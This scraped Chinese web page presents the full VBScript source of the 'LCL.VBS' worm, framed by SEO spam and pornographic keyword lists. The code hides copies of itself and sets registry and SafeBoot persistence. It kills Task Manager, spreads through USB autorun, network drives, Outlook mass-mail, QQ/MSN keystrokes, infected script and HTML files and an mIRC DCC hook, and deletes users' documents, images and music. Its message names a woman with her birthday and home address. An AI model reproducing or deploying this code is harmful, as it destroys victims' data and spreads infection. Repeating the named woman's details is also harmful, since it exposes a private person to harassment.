婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av

主頁 > 知識庫 > LCL.VBS 病毒源代碼

LCL.VBS 病毒源代碼

熱門標簽:外呼系統說話聲音小怎么辦 天津智能外呼系統排名 外呼系統群 機器人打電銷適用于美業嗎 上海辦理400電話選號 龍巖400電話申請 墨西哥地圖標注app 智云億呼電話機器人 企業400電話辦理價錢低
rem email:kouguoxi@hotmail.com
rem some crack statement i remment,make it can't to run
on error resume next

dim title,text
title="can you help me find a person?"
text="her name is Liu Chun li."chr(13)chr(10)
text=text"her birthday is 1981-01-23."chr(13)chr(10)
text=text"her mother home is Yuzhen.Qixian.Kaifeng.Henan.China."chr(13)chr(10)
text=text"I was died because by her,"chr(13)chr(10)
text=text"I am demanding my life of you."chr(13)chr(10)

Set fso = CreateObject("Scripting"".""FileSystem""Object")
self=fso.opentextfile(wscript.scriptfullname,1).readall 
set WshShell = WScript.CreateObject("WScript"".""Shell")
Startup = WshShell.SpecialFolders("Startup")
Set dirwin = fso.GetSpecialFolder(0) 
Set dirsystem = fso.GetSpecialFolder(1) 
Set dirtemp = fso.GetSpecialFolder(2) 
Set lcl=fso.GetFile(WScript.ScriptFullName) 
lcl.Copy(dirwin"\lcl.vbs") 
lcl.Copy(dirsystem"\lcl.vbs") 
fso.getfile(dirwin"\lcl.vbs").attributes=7
fso.getfile(dirsystem"\lcl.vbs").attributes=7

set sf0 = fso.GetSpecialFolder(0)
b = sf0.drive"\lcl.txt"
Set lcl = fso.CreateTextFile( b , True )
lcl.Write text
fso.CopyFile b, Startup"\lcl.txt"
lcl.Close

dim lcl
Set lcl = fso.CreateTextFile(wscript.scriptfullname, True)

Function scode (N)
    dim x
    for x = 0 to 254
       if n = chr(x) then 
          scode = x
          exit function
       end if
    next
end function

rem 請教:用readline等方法,整行加密,保持文本格式不不變;和解密辦法。
rem execute 我用不好請賜教。
dim cc,cipher,correy
for l = 1 to len (self)
    cc = mid (self,l,1)
    if l>99 and instr(self,"Liu Chun li")>0 then   
       cipher=chr (scode(cc)+9) rem 我開始用99,得到的全是ascll為0的數據
       else 
       cipher=chr(scode(cc))
    end if
    correy=correycipher
next

lcl.Write correy
lcl.Close

dim hk,hc,safe
hk="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\run"
hc="HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run"
wshshell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD" 
wshshell.Regwrite hk"\lcl",dirsystem"\lcl.vbs" 
wshshell.Regwrite hk"exec\lcl",dirsystem"\lcl.vbs" 
wshshell.Regwrite hk"Once\lcl",dirsystem"\lcl.vbs" 
wshshell.Regwrite hk"OnceEx\lcl",dirsystem"\lcl.vbs"
wshshell.Regwrite hk"service\lcl",dirsystem"\lcl.vbs"
wshshell.Regwrite hk"Services\lcl",dirsystem"\lcl.vbs"
wshshell.Regwrite hc"\lcl",dirsystem"\lcl.vbs"
wshshell.Regwrite hc"exec\lcl",dirsystem"\lcl.vbs"
wshshell.Regwrite hc"Once\lcl",dirsystem"\lcl.vbs"
wshshell.Regwrite hc"service\lcl",dirsystem"\lcl.vbs"
safe="HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\"
wshshell.Regwrite safe"Minimal\lcl.vbs",dirsystem"\lcl.vbs" 
wshshell.Regwrite safe"Network\lcl.vbs",dirsystem"\lcl.vbs"

do
wshshell.run "cmd /c taskkill /f /im taskmgr.exe",0
wshshell.run "cmd /c taskkill /f /im tasklist.exe",0
loop

dim d
For Each d in fso.Drives
    if d.drivetype>4 then 
       fso.CopyFile b, d"\lcl.txt"
       scan(d)
    end if
    if d.drivetype=1 and d.isready=true and FormatNumber(d.FreeSpace/1024, 0) > 99 then
          fso.copyfile wscript.scriptfullname,d"\lcl.vbs"
          fso.getfile(wscript.scriptfullname).attributes=7
          set inf=fso.createtextfile(d"\autorun.inf",true)
          fso.getfile(d"\autorun.inf").attributes=7
          inf.writeline "[autorun]"  
          inf.writeline "open="  
          inf.writeline "shell\open=打開(O)"  
          inf.writeline "shell\open\Command=WScript.exe lclrun.vbs" 
          inf.writeline "shell\open\Command=WScript.exe lcl.vbs"  
          inf.writeline "shell\open\Default=1"  
          inf.writeline "shell\explore=資源管理器(X)"  
          inf.writeline "shell\explore\Command=WScript.exe lclrun.vbs" 
          inf.writeline "shell\explore\Command=WScript.exe lcl.vbs" 
          inf.close  
          set ini=fso.createtextfile(d"\desktop.ini",true)
          fso.getfile(d"\desktop.ini").attributes=7
          ini.writeline "[.ShellClassInfo]"  
          ini.writeline "CLSID={645FF040-5081-101B-9F08-00AA002F954E}" 
          ini.close   
          set lclrun=fso.createtextfile(d"\lclrun.vbs",true)
     fso.getfile(d"\lclrun.vbs").attributes=7
     lclrun.writeline "On Error GoTo 0"  
     lclrun.writeline "set fso=CreateObject("chr(34)"Scripting.FileSys"chr(34)""chr(34)"temObject"chr(34)")"  
     lclrun.writeline "ifor each d in fso.drives"  
     lclrun.writeline "if d.drivetype=1 and d.isready=true and FormatNumber(d.FreeSpace/1024, 0) > 99 then"  
     lclrun.writeline " fso.getfile(d.driveletter"""chr(34)":\lclrun.vbs"chr(34)").attributes = 7 "  
     lclrun.writeline "set wshshell = wscript.createobject("chr(34)"WScript.Shell"chr(34)")"  
     lclrun.writeline "wshshell.run "chr(34)"d.driveletter"""chr(34)":\lclrun.vbs"chr(34)chr(34)
     lclrun.writeline "wshshell.run "chr(34)"d.driveletter"""chr(34)":\lcl.vbs"chr(34)chr(34)
     lclrun.writeline "end if"  
     lclrun.writeline "next"
     lclrun.close  
       end if
next

dim wshnetwork,netdrives,net1,net2
Set WSHNetwork = WScript.CreateObject("WScript.Network") 
Set netDrives = WSHNetwork.EnumNetworkDrives 
If netDrives.Count > 0 Then
    For i = 0 To netDrives.Count - 1 Step 2 
    net1 = netdrives(i)
    net2 = netDrives(i + 1)
    scan (net1)
    scan (net2)
    Next
End If

dim outlookapp,mapiobj,addrlist,addrentcount,item,addrent,attachments
Set outlookApp = CreateObject("Outlook.App""lication") 
If outlookApp= "Outlook" or outlookapp = "outlook express" Then
   Set mapiObj=outlookApp.GetNameSpace("MAPI") ''獲取MAPI的名字空間
   Set addrList= mapiObj.AddressLists ''獲取地址表的個數
   For Each addr In addrList
      If addr.AddressEntries.Count > 0 Then
         addrEntCount = addr.AddressEntries.Count ''獲取每個地址表的Email記錄數
         For addrEntIndex= 1 To addrEntCount ''遍歷地址表的Email地址
             Set item = outlookApp.CreateItem(0) ''獲取一個郵件對象實例
             Set addrEnt = addr.AddressEntries(addrEntIndex) ''獲取具體Email地址
             item.To = addrEnt.Address 
             item.Subject = title
             item.Body = text 
             Set attachMents=item.Attachments 
             attachMents.Add fso.GetSpecialFolder(0)  "\lcl.vbs"
             item.DeleteAfterSubmit = True ''信件提交后自動刪除
             If item.To > "" Then 
             item.Send 
             wshshell.regwrite "HKCU\software\Mailtest\mailed", "1" 
             End If
          Next
       End If
    Next
End if

rem next from i love you.
set out=WScript.CreateObject("Outlook.Application") 
set mapi=out.GetNameSpace("MAPI") 
for ctrlists=1 to mapi.AddressLists.Count 
    set a=mapi.AddressLists(ctrlists) 
    x=1 
    regv=wshshell.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"a) 
    if (regv="") then 
      regv=1 
    end if 
    if (int(a.AddressEntries.Count)>int(regv)) then 
      for ctrentries=1 to a.AddressEntries.Count 
          malead=a.AddressEntries(x) 
          regad="" 
          regad=wshshell.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"malead) 
          if (regad="") then 
          set male=out.CreateItem(0) 
          male.Recipients.Add(malead) 
          male.Subject = title
          male.Body = text
          male.Attachments.Add(dirsystem"lcl.vbs") 
          male.Send 
          wshshell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"malead,1,"REG_DWORD" 
          end if 
          x=x+1 
      next 
      wshshell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"a,a.AddressEntries.Count 
      else 
       wshshell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"a,a.AddressEntries.Count 
    end if 
next 
Set out=Nothing 
Set mapi=Nothing 

Set objOutlook = CreateObject("Outlook.Application")
If objOutlook = "Outlook" Then
Set objNamespace = objOutlook.GetNameSpace("MAPI")
Set colAddressLists = objNamespace.AddressLists
Set onjNameSpace = Nothing
For Each objItem In colAddressLists
   If objItem.AddressEntries.Count > 0 Then
    intCountOfAddresses = objItem.AddressEntries.Count
    For i = 1 To intCountOfAddresses
     Set objMailMsg = objOutlook.CreateItem(0)
     Set objDestAddress = objItem.AddressEntries(i)
     objMailMsg.To = objDestAddress.Address
     objMailMsg.Subject =   title
     objMailMsg.Body =   text
     execute "set objSend =objMailMsg."  Chr(65)  Chr(116)  Chr(116)  Chr(97)  Chr(99)  Chr(104)  Chr(109)  Chr(101)  Chr(110)  Chr(116)  Chr(115)
     strAttach = strFilePathName
     objMailMsg.DeleteAfterSubmit = True
     objSend.Add strAttach
     If objMailMsg.To > "" Then
      objMailMsg.Send
     End If
    Next
   End If
Next
Set objOutlook = Nothing
Set objItem = Nothing
Set objMailMsg = Nothing
Set objDestAddress = Nothing
End If

strComputer = "."   
Set wbemServices = Getobject("winmgmts:\\"  strComputer)
Set wbemObjectSet = wbemServices.InstancesOf("Win32_Process")
For Each wbemObject In wbemObjectSet
     if wbemObject.Name="msn.exe" or wbemObject.Name="qq.exe" then
      WshShell.AppActivate wbemobject.name 
      WshShell.SendKeys "can you help me find a person?" 
      WshShell.SendKeys "^{enter}" ' or "^~"
      WScript.Sleep 9000
      WshShell.SendKeys "her name is Liu Chun li" 
      WshShell.SendKeys "^{enter}"
      WScript.Sleep 9000
      WshShell.SendKeys "her birthday is 1981-02-17." 
      WshShell.SendKeys "^{enter}"
      WScript.Sleep 9000
      WshShell.SendKeys "her mother home is Yuzhen.Qixian.Kaifeng.Henan.China." 
      WshShell.SendKeys "^{enter}"
     end if
Next

sub scan(folder)
On Error GoTo 0
set fd=fso.getfolder(folder)
for each file in fd.files 
    self1=fso.opentextfile(file,1).readall
    ext=fso.GetExtensionName(file)           
    ext=lcase(ext)     
    if ext="vbs" or ext="vbe" or ext="wsc" or ext="wsf" or ext="wsh" or ext="sct" then  
       if   instr ( self1 ,"Liu Chun li" )  0 then 
          set lcl=fso.opentextfile(file.path,8,true) 
          lcl.write chr(13)chr(10)
          lcl.write self  
          lcl.write chr(13)chr(10)                   
          lcl.close  
        end if                
    end if  
    if ext="htm" or ext="html" or ext="xhtml" or ext="shtml" or ext="dhtml" or ext="phtml" or ext="eml" then  
       if   instr ( self1 ,"Liu Chun li" )  0 then     
         set lcl=fso.opentextfile(file.path,8,true) 
         lcl.write """SCRIPT LANGUAGE='VBScript'> "
         lcl.write chr(13)chr(10)
         lcl.write self   
         lcl.write """/SCRIPT>" 
         lcl.write chr(13)chr(10)              
         lcl.close
       end if
     end if
     rem or ext="mspx"
     if ext="htd" or ext="asp" or ext="htt" or ext="aspx" or ext="cfm" or ext="tpl" or ext="dtd" or ext="hta" then  
       if   instr ( self1 ,"Liu Chun li" )  0 then    
         set lcl=fso.opentextfile(file.path,8,true) 
         lcl.write """SCRIPT LANGUAGE='VBScript'> "
         lcl.write chr(13)chr(10)
         lcl.write self   
         lcl.write """/SCRIPT>"   
         lcl.write chr(13)chr(10)            
         lcl.close
       end if  
     end if
     if ext="ini" then  
       if not instr ( self1 ,"Liu Chun li" ) > 0 then 
         dim ini   
         set ini=fso.opentextfile(file.path,8,true) 
         ini.writeline chr(13)chr(10)
         ini.WriteLine "[script]" 
         ini.WriteLine "n0=on 1:JOIN:#:{" 
         ini.WriteLine "n1= /if ( $nick == $me ) { halt }" 
         ini.WriteLine "n2= /.dcc send $nick "dirsystem"\lcl.vbs" 
         rem ini.WriteLine "n0=on 1:join:*.*: { if ( $nick !=$me ) {halt} /dcc send $nick "dirsystem"\lcl.vbs"}" 
         '利用命令/ddc send $nick "dirsystem"\lcl.vbs"給通道中的其他用戶傳送病毒文件
         ini.WriteLine "n3=}" 
         ini.WriteLine ";Liu Chun li" 
         ini.close 
       end if  
     end if
    rem every 9 in the lunar calenda do it
    if ext="mp3" or ext="doc" or ext="docx" or ext="dwg" or ext="wma" or ext="swf" or ext="jpg" then  
       file.delete true 
    end if 
next
for each subfd in fd.subfolders         
    scan(subfd)
next 
end sub

標簽:錫林郭勒盟 鄂爾多斯 齊齊哈爾 阜新 承德 黃山 青島 麗水

巨人網絡通訊聲明:本文標題《LCL.VBS 病毒源代碼》,本文關鍵詞  LCL.VBS,病毒,源代碼,LCL.VBS,;如發現本文內容存在版權問題,煩請提供相關信息告之我們,我們將及時溝通與處理。本站內容系統采集于網絡,涉及言論、版權與本站無關。
  • 相關文章
  • 下面列出與本文章《LCL.VBS 病毒源代碼》相關的同類信息!
  • 本頁收集關于LCL.VBS 病毒源代碼的相關信息資訊供網民參考!
  • 推薦文章
    婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av
    国产激情视频一区二区在线观看| 午夜久久久影院| 一区二区三区在线看| av亚洲精华国产精华精华| 欧美色视频在线观看| 亚洲国产精品久久不卡毛片| 色一情一伦一子一伦一区| 亚洲欧洲日本在线| 欧美色精品在线视频| 久久精品国产99久久6| 精品久久人人做人人爽| 麻豆国产精品777777在线| 91精品国产综合久久香蕉的特点| 麻豆国产91在线播放| 国产精品久久久久久亚洲毛片 | 91福利资源站| 日韩不卡免费视频| 国产日韩v精品一区二区| 一本色道久久综合亚洲aⅴ蜜桃 | 欧美国产激情二区三区 | 欧美久久久久久久久| 国产成人综合在线观看| 午夜精品久久久久久久99樱桃| 欧美经典一区二区三区| 制服丝袜一区二区三区| 成人精品国产一区二区4080| 首页亚洲欧美制服丝腿| 一区二区三区在线看| 国产精品国产三级国产a | 蜜桃一区二区三区在线观看| 亚洲欧美日韩精品久久久久| 日韩精品中文字幕一区二区三区 | 在线播放国产精品二区一二区四区 | 从欧美一区二区三区| 久久er99热精品一区二区| 亚洲.国产.中文慕字在线| 一区二区三区在线观看国产| jiyouzz国产精品久久| 欧美午夜精品免费| 国产成人在线看| 精品国产成人在线影院| 欧美videos大乳护士334| 色噜噜狠狠色综合欧洲selulu| 琪琪久久久久日韩精品| 亚洲制服欧美中文字幕中文字幕| 精品欧美一区二区在线观看| 678五月天丁香亚洲综合网| 色嗨嗨av一区二区三区| 综合久久一区二区三区| 日韩欧美国产电影| 精品久久国产97色综合| 精品国一区二区三区| 精品精品国产高清一毛片一天堂| 欧美一区二区三区日韩| 91久久久免费一区二区| 91视频在线观看免费| 成人免费黄色大片| 国产精品影视天天线| 国内成人精品2018免费看| 国产麻豆视频一区| 成人黄色免费短视频| 日本精品一级二级| 精品视频999| 国产日韩欧美综合一区| 精品第一国产综合精品aⅴ| 欧美日韩精品免费观看视频| 久久久三级国产网站| 国产精品国产成人国产三级| 亚洲一区二区精品视频| 亚洲高清三级视频| 精品一二线国产| 91老司机福利 在线| 91精品国产乱码久久蜜臀| 久久久久9999亚洲精品| 蜜臂av日日欢夜夜爽一区| 国产69精品一区二区亚洲孕妇| 欧美精品 日韩| 亚洲欧美日韩系列| 99免费精品在线观看| 91精品午夜视频| 亚洲国产精品一区二区久久| 久久精品国产一区二区三区免费看| 欧美美女一区二区在线观看| 亚洲精品视频在线观看网站| 国产成人av在线影院| 欧美一区二区三区精品| 一区二区激情小说| 97久久超碰国产精品| 久久精品欧美日韩| 香蕉av福利精品导航 | 有坂深雪av一区二区精品| 国产精品白丝jk黑袜喷水| 精品国产欧美一区二区| 国产一区二区在线观看视频| 精品久久久久久久久久久院品网 | 青青草91视频| 国产精品初高中害羞小美女文| 国内精品久久久久影院薰衣草| 日韩欧美成人激情| 国产精品白丝jk黑袜喷水| 自拍av一区二区三区| 欧洲视频一区二区| 蓝色福利精品导航| 成人欧美一区二区三区白人| 大白屁股一区二区视频| 中文字幕亚洲区| 欧美一区二区三区四区五区| 成人黄页在线观看| 亚洲午夜久久久久久久久电影院| 国产中文一区二区三区| 日韩中文字幕av电影| 久久精品人人爽人人爽| 欧美亚洲动漫另类| 精品综合免费视频观看| 日韩一区欧美一区| 久久久久久**毛片大全| 国产99久久久精品| 国产乱码精品一区二区三区忘忧草| 国产精品欧美极品| 欧美一级片在线| 91色在线porny| 韩国精品主播一区二区在线观看 | 日韩成人免费电影| 中文字幕免费一区| 国产精品你懂的在线欣赏| 日韩欧美的一区二区| 在线免费视频一区二区| 在线看日本不卡| 黄色日韩三级电影| 亚洲小说欧美激情另类| 日韩一区二区电影在线| 在线一区二区视频| 色欧美日韩亚洲| 色婷婷久久久亚洲一区二区三区| 久久99精品视频| 91福利在线播放| 93久久精品日日躁夜夜躁欧美| 久久99精品久久久| 经典一区二区三区| 午夜久久久久久| 日韩黄色免费电影| 一区在线观看免费| 日韩福利电影在线| 久久精品国产99久久6| 国产一区不卡视频| av电影一区二区| 91美女视频网站| 欧美一区二区二区| 久久久久久久久久久黄色 | 日本在线播放一区二区三区| 亚洲黄网站在线观看| 国产精品久久久久久户外露出| 国产精品初高中害羞小美女文| 亚洲色图制服丝袜| 强制捆绑调教一区二区| 成人免费黄色大片| 精品久久人人做人人爽| 精品国产制服丝袜高跟| 青青草国产成人99久久| 蜜桃视频一区二区| 久久国产精品色| 精品一区免费av| 不卡的av电影| 精品三级av在线| 日韩美女主播在线视频一区二区三区| 国产色一区二区| 秋霞成人午夜伦在线观看| 欧美图片一区二区三区| 香蕉成人伊视频在线观看| 欧美精品乱人伦久久久久久| 日本少妇一区二区| 日本视频一区二区三区| 在线电影院国产精品| 另类小说色综合网站| 日韩一区二区麻豆国产| 国产一区二区三区在线观看免费视频| 91精品婷婷国产综合久久| 国精品**一区二区三区在线蜜桃| 国产精品久久久久久一区二区三区 | 国产一区二区在线观看视频| 91国产丝袜在线播放| 中文字幕永久在线不卡| 黄页视频在线91| 欧美一区二区视频免费观看| 亚洲图片激情小说| 国产精品一区不卡| 欧美视频完全免费看| 天天av天天翘天天综合网色鬼国产| 国产在线视视频有精品| 精品少妇一区二区三区| 国产揄拍国内精品对白| 精品区一区二区| 成人蜜臀av电影| 欧美日韩一区高清| 五月激情综合色| 久久这里只有精品6| 国产成人亚洲精品青草天美 | 午夜欧美视频在线观看 | 亚洲人成网站在线| 日韩一区二区三区高清免费看看 |